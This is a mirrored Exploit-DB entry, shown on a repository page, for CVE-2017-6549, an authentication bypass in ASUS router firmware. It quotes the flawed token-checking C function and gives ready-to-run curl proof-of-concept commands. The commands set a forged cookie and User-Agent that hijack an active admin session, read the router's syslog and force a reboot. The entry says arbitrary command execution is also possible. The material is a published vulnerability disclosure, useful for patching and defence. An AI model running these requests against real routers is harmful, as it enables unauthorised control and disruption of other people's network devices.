bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/41572.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

56 lines
No EOL
1.6 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Session Stealing
Component: httpd
CVE: CVE-2017-6549
Vulnerability:
httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
asus_token_t *ptr = head;
asus_token_t *tmp = NULL;
int found = 0;
char *cp = NULL;
while(ptr != NULL)
{
if(!strncmp(token, ptr->token, 32)) {
found = 1;
break;
}
else if(strncmp(token, "cgi_logout", 10) == 0) {
cp = strtok(ptr->useragent, "-");
if(strcmp(cp, "asusrouter") != 0) {
found = 1;
break;
}
}
else {
tmp = ptr;
ptr = ptr->next;
}
}
if(found == 1) {
if(prev)
*prev = tmp;
return ptr;
}
else {
return NULL;
}
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.
PoC:
# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
Its possible to execute arbitrary commands on the router if any admin session is currently active.
Reference in a new issue View git blame Copy permalink